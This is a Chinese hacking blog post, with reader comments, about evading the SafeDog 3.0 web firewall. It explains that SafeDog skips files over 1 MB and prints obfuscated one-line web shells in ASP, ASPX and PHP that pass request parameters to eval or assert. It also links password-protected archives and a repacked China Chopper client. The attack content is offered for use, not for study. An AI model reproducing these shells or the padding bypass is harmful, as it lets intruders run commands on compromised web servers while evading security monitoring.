关于脚本木马的免杀(针对安全狗的V3.0)经验

安全狗3.0默认忽略大于1048576字节即1M的文件(如图)。

至于怎么把木马弄成大于1M,你应该懂的。

另外,脚本文件只是在初次请求时进行编译,如果没有修改的话是不会再次编译的。

简单来说就是,文件变大了只会影响第一次访问速度,不会影响之后的访问速度。

untitled_副本.png

最后再发几张一直珍藏的图片娱乐一下:jpg.rar

只要你是个黑客,你就应该懂得这是什么,

安全的图片,哈哈

untitledqqq_副本.png

untitledsfd_副本.png

收费的东西装不起,只能拿几个免费的来试一下了。安全狗什么的是我的最爱啊~

密码?就算我不说密码是-7你也能一眼看出来的吧?(=^_^=)

里面的一句话是

asp和aspx都拆掉了request,但是eval始终拆不掉,残念

<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%@ Page Language = Jscript %>

<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/

"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+

"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+

","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval

(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>

php倒是完全拆掉了(还是php自由度高)

夸一下~哈哈

<?php

@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";

@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";

@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}

[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

喔,顺便把我那把caidao也发一下吧

脱壳XXOO了之后,又加回了upx壳。。。版权什么的我也不知道怎么说了咳

daodao.rar

希望这些东西几个月后还没烂透

(=^_^=)

[原文地址]

相关内容:

简单绕过安全狗进行任何操作 让狗形同虚设

网爆安全狗存在远程溢出漏洞

实战这些年咬过我们的安全狗(总结篇)

看哥是怎么突破安全狗和360网站卫士的

破那个垃圾安全狗技术总汇

安全狗 iis 6.0 ; 截断解析突破

留言评论(旧系统):

佚名 @ 2013-06-24 20:17:14

我可不可以吐槽我是原作者

本站回复:

嗯,你吐槽你自己。

佚名 @ 2013-06-24 23:05:07

楼上要点脸行不?我是原作者。我这有没打码的图,核攻击删文章吧。我不喜欢别人转载我的文章

本站回复:

这个有点意思啦,您又是哪位呢?

JJsec @ 2013-06-24 22:41:43

核大大,请您帮我跟原作者联系上,因为我转载他的文章已经带上作者的名字了,跪求误会解除

本站回复:

目测作者自己会看到的…… ╮(╯_╰)╭

toolz @ 2013-06-25 18:16:05

核总核总,我也要当原作者。。

本站回复:

我勒个去……

佚名 @ 2013-06-25 22:31:53

boss能否弄个过安全狗3.0的浏览器啊?跪求!!

本站回复:

不能

佚名 @ 2013-06-26 09:20:22

核牛,能不能把留言系统换成和freebuf一样的,我想那样会欢乐很多,

本站回复:

本站属自行开发,所以无法更换通用程序,不过以后会改进。

z7y @ 2013-06-27 00:47:27

http://www.z7ys.com 换友链- -

本站回复:

木找到本站链接撒……

佚名 @ 2013-12-11 14:57:07

煞笔

本站回复:

煞笔

一群傻逼 @ 2013-12-12 04:26:57

不就过个狗而已... 争个毛线~~! 哥写的过D盾的也没觉得怎么... 而且目测是某些工具加密的.. 比如 威盾 phpjm 之类的... 有点技术含量好不好...

本站回复:

╮(╯_╰)╭

佚名 @ 2013-12-12 10:41:02

安全狗老是坏我的好事,感谢分享过安全狗的经验

本站回复:

You Are Welcome.

佚名 @ 2014-01-23 17:53:11

密码呢 大牛

本站回复:

什么密码?仔细看文章内容!